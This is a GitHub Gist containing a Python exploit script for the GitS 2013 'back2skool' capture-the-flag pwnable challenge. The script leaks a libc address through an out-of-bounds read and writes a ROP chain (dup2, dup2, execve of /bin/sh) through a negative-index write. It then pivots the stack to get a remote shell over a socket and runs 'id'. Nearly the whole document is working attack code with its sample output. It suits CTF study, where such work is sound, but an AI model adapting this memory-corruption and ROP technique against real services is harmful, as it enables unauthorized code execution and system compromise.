Last active
December 14, 2015 03:39
-
-
Save xelenonz/5022944 to your computer and use it in GitHub Desktop.
Gits2013 Pwnable 250 back2skool sploit code *Important!! - Need to find libc offset to make exploit works!!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket,sys,time,re | |
""" | |
$python skool.py | |
libc_base : 0x840000 | |
shell_base : 0x804c11c | |
Exploit... | |
uid=1003(back2skool) gid=1003(back2skool) | |
""" | |
def readPos(index): | |
sk.send("read\n");sk.recv(10240) | |
sk.send("%d\n"%index) | |
match = re.findall("(\d+)",sk.recv(10240))[1] | |
return hex(int(match)) | |
def writePos(index,value): | |
sk.send("write\n");sk.recv(10240) | |
sk.send("%d\n"%(-2147483648+index));sk.recv(10240) | |
sk.send("%d\n"%value);sk.recv(10240) | |
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
sk.connect(("mylab.local",31337)) | |
time.sleep(1) | |
sk.recv(10248) | |
sk.send("func1\n");sk.recv(10240) | |
eip = 14 | |
base_addr = 0x0804c040 | |
# find libc_base offset by sub with recv() offset | |
libc_base = int(readPos(-32),16)-0x00d4630 | |
xchg_sp_ax = libc_base+0x0005a5a0 | |
dup2 = libc_base+0x00c40a0 | |
execve = libc_base+0x009d6d0 | |
pop2ret = libc_base+0x000772b7 | |
shell = base_addr+(4*55) | |
print "libc_base :",hex(libc_base) | |
print "shell_base :",hex(shell) | |
# Prepare Data before Pwned!! | |
writePos(0,dup2) | |
writePos(1,pop2ret) | |
writePos(2,4) | |
writePos(3,0) | |
writePos(4,dup2) | |
writePos(5,pop2ret) | |
writePos(6,4) | |
writePos(7,1) | |
writePos(8,execve) | |
writePos(9,0x11223344) | |
writePos(10,shell) | |
writePos(11,0) | |
writePos(12,0) | |
writePos(55,0x6E69622f) | |
writePos(56,0x0068732f) | |
# Pwned Stage!!! | |
print "Exploit..." | |
writePos(eip,xchg_sp_ax) # pivot stack :) | |
sk.send("math\n") | |
sk.send("id\n");print sk.recv(10240) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment